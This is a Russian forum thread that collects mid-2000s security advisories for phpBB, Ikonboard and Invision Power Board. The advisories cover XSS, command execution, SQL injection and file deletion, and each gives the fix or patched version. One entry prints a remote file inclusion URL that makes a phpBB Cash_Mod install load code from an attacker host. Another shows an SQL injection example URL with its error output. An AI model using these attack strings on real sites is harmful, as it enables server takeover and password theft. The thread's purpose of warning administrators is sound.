Межсайтовый скриптинг в Ikonboard 2.1.9 RussianFullPack
Уязвимость в Ikonboard позволяет удаленному пользователю выполнить XSS нападение. (http://www.securitylab.ru/46410.html)
Не знаю какая версия стоит на форуме, но данная фишка на нем присутствует. Правда форому от этого побарабану, но пользователей форума это каснуться может...

Изменение содержимого логов поиска с целью выполнение команд на сервере в Ikonboard 2.1.9 RussianFullPack форуме
Уязвимость в Ikonboard в search.cgi позволяет удаленному пользователю изменить содержимое логов поиска, чтобы выполнить произвольные команды на сервере. (http://www.securitylab.ru/46485.html)

В модуле Cash_Mod популярного форумного движка phpBB 2 несколько дней назад была обнаружена опасная уязвимость.
С помощью опубликованного в интернете эксплоита (http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513) удаленный атакующий имеет возможность выполнить на уязвимой системе собственный PHP-код таким образом: http://хост.жертвы/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://хост.атакующего/

Проблема в том, пишет ежедневное интернет-издание "Вебпланета", что на движке phpBB работает большое количество форумов в Рунете, и для их владельцев сегодняшний день стал настоящим кошмаром. Анализ логов показал, что банды российских хакеров с сегодняшнего дня уже вовсю начали использовать опубликованный эксплоит, который позволяет проникнуть в систему, получить пароли к базе данных, и скрыться незаметно для владельца форума.

Судя по всему, многие владельцы форумов на phpBB 2 до сих не осознали существующей опасности. Им нужно срочно закрыть доступ к форумам и оперативно устранить уязвимость - вчера была опубликована пропатченная версия phpBB 2.0.11 (http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240636). После этого можно посмотреть в логах, что успели утащить хакеры и при необходимости поменять пароли

SQL инъекция в Invision Power Board

23 ноября 2004
Программа: Invision Power Board 2.х
Опасность: Высокая
Наличие эксплоита: Да
Описание: Уязвимость в Invision Power Board позволяет удаленному пользователю выполнить произвольные SQL команды на основной базе данных.
Уязвимость была обнаружена в результате автоматической проверки сканером безопасности Xspider 7.0.
Пример/Эксплоит:
http://site/forum/index.php?act=Post&CODE=02&f=2&t=1&qpid=1[sql_injection]
Result:

--------------------------------------------------------------------------
mySQL query error: select p.*,t.forum_id FROM ibf_posts p LEFT JOIN
ibf_topics t ON (t.tid=p.topic_id)
WHERE pid IN (1[sql_injection])

mySQL error: You have an error in your SQL syntax near '[sql_injection])' at
line 2
mySQL error code:
Date: Friday 12th of November 2004 06:53:25 PM
--------------------------------------------------------------------------
URL производителя: http://www.invisionboard.com/
Решение:Установите обновленную версию форума: http://forums.invisionpower.com/index.php?showtopic=154916

-=источник и подробности (http://www.securitylab.ru/49631.html)=-

Заплатки для PHP (http://forum.oszone.net/showthread.php?p=293098#post293098)
PHP Group выпустила две заплатки, устраняющих уязвимости в интерпретаторе языка серверных сценариев PHP. Это версии 4.3.10 и 5.0.3 — сервисные выпуски, заменяющие 4.3.9 и 5.0.2.
...
Уязвимости ставят под угрозу безопасность пользователей множества популярных форумов, работающих на движках, написанных на PHP: PHPBB, Invision Board, vBulletin и других.
...

Просмотр и удаление произвольных файлов в phpBB форуме

22 февраля 2005
Просмотр и удаление произвольных файлов в phpBB форуме
Программа: phpBB 2.0.11
Опасность: Средняя
Наличие эксплоита: Нет
Описание: Уязвимость в phpBB форуме позволяет удаленному пользователю раскрыть содержание и удалять (unlink) произвольные файлы на системе с привилегиями Web сервера.
Уязвимость в phpBB в нескольких сценариях, отвечающих за обработку аватаров (usercp_avatar.php, usercp_viewprofile.php и usercp_register.php) позволяет удаленному пользователю контролировать параметры, переданные функции unlink().
Технические подробности см. в источнике сообщения.
URL производителя: http://www.phpbb.com
Решение:Установите обновленную версию форума (2.0.12): http://www.phpbb.com/downloads.php

-= источник (http://www.securitylab.ru/52875.html) =-

Удаленный административный доступ в phpbb форуме

Программа: Phpbb 2.0.12
Опасность: Критическая
Наличие эксплоита: Нет
Описание: Уязвимость в PhpBB позволяет удаленному пользователю обойти некоторые ограничения безопасности и получить административные привилегии на форуме.
...
URL производителя: http://www.phpbb.com
Решение:Обновите форум до 2.0.13

-= источник и подробности (http://www.securitylab.ru/52986.html) =-

Межсайтовый скриптинг в при обработке BBCODE URL в phpBB

Программа: phpBB версии до 2.0.15
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
...
URL производителя: www.phpbb.com

Решение: Установите последнюю версию (2.0.15) с сайта производителя.


-= источник и подробности (http://www.securitylab.ru/55012.html) =-